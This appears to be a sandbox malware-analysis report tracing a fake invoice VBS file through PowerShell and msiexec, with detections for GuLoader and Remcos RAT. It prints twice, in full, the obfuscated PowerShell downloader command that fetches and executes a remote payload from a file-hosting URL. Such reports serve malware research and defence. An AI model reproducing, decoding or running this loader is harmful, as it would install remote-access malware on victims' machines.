                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs"
                                                                                        Imagebase:0x7ff626030000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:14:15:01
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:ping Host_6637.6637.6637.657e
                                                                                        Imagebase:0x7ff609a80000
                                                                                        File size:22'528 bytes
                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:14:15:01
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff642da0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:14:15:02
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd UndeMatrrDia sMira[Dece$SateAPrebr padcBr ghS ikeTranrpokayBown] k a=Ttyf$IndeD .psaUnsctBgeraPrudfPan i.amalStan7,orp9');$Thermoses=Subrogate 'pa t$PrelAModit Ve hNosteForloDimelEct oElitgSygeyStue.StteDSandoGte wSpannMonolSikkoFolkaAdmidFi iF O eiNyphlsyfieStor(Ditt$ totR SameCompaSejosOutpkPort,Bdg,$ urG TeglBaa.oBur,zFor eGibbsSint)';$Glozes=$Styringsafdelingens;Elektriseringers (Subrogate 'Subt$DalegUnculGin,OPo oBAfleaRed.lRewa:SolldVe,iI IndmQuizEFjeltAmnehGadgY ettL.rykbR veEMag nUdd Z cieBeren NyleNick=,adn( dittPatreFritsJgertDiap-VandPDespaBeritCillH dvi In $Jvn.gKum LDisco ronzTatteAnssSSted)');while (!$Dimethylbenzene) {Elektriseringers (Subrogate 'S um$ Lr gUnlilNon.o S obFr.earefelMile:UnprFMonooArtirMorrc MeniCatep KaciNonfaMagllBrat=Dren$Re sn SysoConjni bjiReinn middzi buStrks BintApprrRadiiBr.gaCalclpr.gi.ienzPreee Hydd') ;Elektriseringers $Thermoses;Elektriseringers (Subrogate 'Frsl[ ChoTSidehPlasRP,ssEcrueaAd idOdalI FinnSeerGPleu.D ciTAccehObexrDip.EAu iaBru D Spn]Tamp:Maza: ApoSSatcl Bede A,seNu,epPedi(Eksp4Iskl0Pe v0Hard0prec)');Elektriseringers (Subrogate 'Mi.d$ QuigAr nlDirio Skrb Pela FoulUnde:SuppDParaiQuatmAthieJin TPa rhTranyBarklbuncbHundEAmp.N .etz orEKe,inToadESubc=Over( RedTUnfaEt.inSBrgetByra-LogrPTetrASemiT Neuh egt Sco$Forsg TidlCestOFremZRehae Da SGass)') ;Elektriseringers (Subrogate 'Cook$NoneGGrntL,onpoVentbspecaDisclUdgy: Udgk,agtv atrIHem nAreoD.verE dmi= Ele$OrthGAramLRealob,haBP ocaKlasL Amn: cirr andASt vVSavnNUgeniFarmnLevngU.dy+Forr+Auto%Side$SlikaGau sDienpZygoh bagAFabrLN.utTS ksEtalerPoss.Tr sC Lu o PopUtungNUnsot') ;$Reask=$Asphalter[$kvinde]}$Belemringen=344979;$Altsaxer=31350;Elektriseringers (Subrogate ' .id$ A tGForsL D pOPhotBDe.gAForsl E o: Kont NedHU,reiS droUnnuR labEUdtrsTh,aOTo,prEuphc J aI DetNUndeO UnfLAcet Rege=Gran SupeGPante traTUddi-Tro cB owO hjen Ko,tKnale edeNudpoT Sal ,hii$Li egMetalLektO edfZUnprETin S');Elektriseringers (Subrogate 'drue$Uefag Legl Mi oLafgbFo ka InhlWhis:SentEi dokWoodsMentpPlaseDetndOegei Ov t Jugr usteBanenStansEiv Fjsi= rea L ve[ParaSG atySammsFirpt rste Trum Wat.Sh.dC KogoTuranSurvvUnsieHestr Su t Rot]Slip:Unre:TabaFLyserhaemo.ogemPrenB ,oraUnivsMenoeSkuf6Vans4U spSOttetparcrFulniM ssnDes gc,ll(Pree$MinoTSalmhSyntiFal oLater P.leKorasVillo DunrWin cAzt,iUnnena looNed lDyre)');Elektriseringers (Subrogate ' Fus$Ung g KulLHalvOG,beb SkjASemtLOpre:Zo gk UnsV Mg i BagvIn eaSmalLPe.iE ompRIncrEIndrsPerj Coun=S yr Tap [PolysTentyHitssThretFedtE D iM spe. KomtAutoEUnexx Ur.TLary.C,roeAgnoNGeomCRaaboBangdIn iibistnUdl gBr k] Int:Bis,:EloxaprskS,osec boniSe eI Reh.Armeg Bl E,ydbt ClaSNympTEpicrAdv iIdioN unnG Me ( s.n$ ksE.plakPionsU.eepJuleE B.uDMa uIDukstKambRS,areBlteN ors L,e)');Elektriseringers (Subrogate ' W.n$HjemG InvLE seoRehob Un AHilsL Kik:fleaoGe aLP eiFSacrENgstr HilT UtrS San= Mo $Pun K IntV.issi KrlvSputAPeraLHilleIndeRAss,EFo.ss til.b nbSRefoUConsBfasts raT frsrSvumICephNphenG Fis(P.rr$D spBAvisE nelGloeEMycemDataRGe tiO poNforsgOrthETelenLeds,lysk$.ortaBorgLF skTAntisDeonAVentXgoa E NonR U.h)');Elektriseringers $Olferts;"
                                                                                        Imagebase:0x7ff6ec5a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1401976050.000002A9C69D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:14:15:02
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff642da0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:14:15:09
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7c8b00000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:14:15:25
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd UndeMatrrDia sMira[Dece$SateAPrebr padcBr ghS ikeTranrpokayBown] k a=Ttyf$IndeD .psaUnsctBgeraPrudfPan i.amalStan7,orp9');$Thermoses=Subrogate 'pa t$PrelAModit Ve hNosteForloDimelEct oElitgSygeyStue.StteDSandoGte wSpannMonolSikkoFolkaAdmidFi iF O eiNyphlsyfieStor(Ditt$ totR SameCompaSejosOutpkPort,Bdg,$ urG TeglBaa.oBur,zFor eGibbsSint)';$Glozes=$Styringsafdelingens;Elektriseringers (Subrogate 'Subt$DalegUnculGin,OPo oBAfleaRed.lRewa:SolldVe,iI IndmQuizEFjeltAmnehGadgY ettL.rykbR veEMag nUdd Z cieBeren NyleNick=,adn( dittPatreFritsJgertDiap-VandPDespaBeritCillH dvi In $Jvn.gKum LDisco ronzTatteAnssSSted)');while (!$Dimethylbenzene) {Elektriseringers (Subrogate 'S um$ Lr gUnlilNon.o S obFr.earefelMile:UnprFMonooArtirMorrc MeniCatep KaciNonfaMagllBrat=Dren$Re sn SysoConjni bjiReinn middzi buStrks BintApprrRadiiBr.gaCalclpr.gi.ienzPreee Hydd') ;Elektriseringers $Thermoses;Elektriseringers (Subrogate 'Frsl[ ChoTSidehPlasRP,ssEcrueaAd idOdalI FinnSeerGPleu.D ciTAccehObexrDip.EAu iaBru D Spn]Tamp:Maza: ApoSSatcl Bede A,seNu,epPedi(Eksp4Iskl0Pe v0Hard0prec)');Elektriseringers (Subrogate 'Mi.d$ QuigAr nlDirio Skrb Pela FoulUnde:SuppDParaiQuatmAthieJin TPa rhTranyBarklbuncbHundEAmp.N .etz orEKe,inToadESubc=Over( RedTUnfaEt.inSBrgetByra-LogrPTetrASemiT Neuh egt Sco$Forsg TidlCestOFremZRehae Da SGass)') ;Elektriseringers (Subrogate 'Cook$NoneGGrntL,onpoVentbspecaDisclUdgy: Udgk,agtv atrIHem nAreoD.verE dmi= Ele$OrthGAramLRealob,haBP ocaKlasL Amn: cirr andASt vVSavnNUgeniFarmnLevngU.dy+Forr+Auto%Side$SlikaGau sDienpZygoh bagAFabrLN.utTS ksEtalerPoss.Tr sC Lu o PopUtungNUnsot') ;$Reask=$Asphalter[$kvinde]}$Belemringen=344979;$Altsaxer=31350;Elektriseringers (Subrogate ' .id$ A tGForsL D pOPhotBDe.gAForsl E o: Kont NedHU,reiS droUnnuR labEUdtrsTh,aOTo,prEuphc J aI DetNUndeO UnfLAcet Rege=Gran SupeGPante traTUddi-Tro cB owO hjen Ko,tKnale edeNudpoT Sal ,hii$Li egMetalLektO edfZUnprETin S');Elektriseringers (Subrogate 'drue$Uefag Legl Mi oLafgbFo ka InhlWhis:SentEi dokWoodsMentpPlaseDetndOegei Ov t Jugr usteBanenStansEiv Fjsi= rea L ve[ParaSG atySammsFirpt rste Trum Wat.Sh.dC KogoTuranSurvvUnsieHestr Su t Rot]Slip:Unre:TabaFLyserhaemo.ogemPrenB ,oraUnivsMenoeSkuf6Vans4U spSOttetparcrFulniM ssnDes gc,ll(Pree$MinoTSalmhSyntiFal oLater P.leKorasVillo DunrWin cAzt,iUnnena looNed lDyre)');Elektriseringers (Subrogate ' Fus$Ung g KulLHalvOG,beb SkjASemtLOpre:Zo gk UnsV Mg i BagvIn eaSmalLPe.iE ompRIncrEIndrsPerj Coun=S yr Tap [PolysTentyHitssThretFedtE D iM spe. KomtAutoEUnexx Ur.TLary.C,roeAgnoNGeomCRaaboBangdIn iibistnUdl gBr k] Int:Bis,:EloxaprskS,osec boniSe eI Reh.Armeg Bl E,ydbt ClaSNympTEpicrAdv iIdioN unnG Me ( s.n$ ksE.plakPionsU.eepJuleE B.uDMa uIDukstKambRS,areBlteN ors L,e)');Elektriseringers (Subrogate ' W.n$HjemG InvLE seoRehob Un AHilsL Kik:fleaoGe aLP eiFSacrENgstr HilT UtrS San= Mo $Pun K IntV.issi KrlvSputAPeraLHilleIndeRAss,EFo.ss til.b nbSRefoUConsBfasts raT frsrSvumICephNphenG Fis(P.rr$D spBAvisE nelGloeEMycemDataRGe tiO poNforsgOrthETelenLeds,lysk$.ortaBorgLF skTAntisDeonAVentXgoa E NonR U.h)');Elektriseringers $Olferts;"
                                                                                        Imagebase:0x7ff7c8b00000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1882393823.00000000085B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1867994553.0000000005785000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1882574423.000000000B684000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:14:15:25
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff642da0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:14:16:13
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                        Imagebase:0x460000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:14:16:47
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\msiexec.exe"
                                                                                        Imagebase:0x460000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >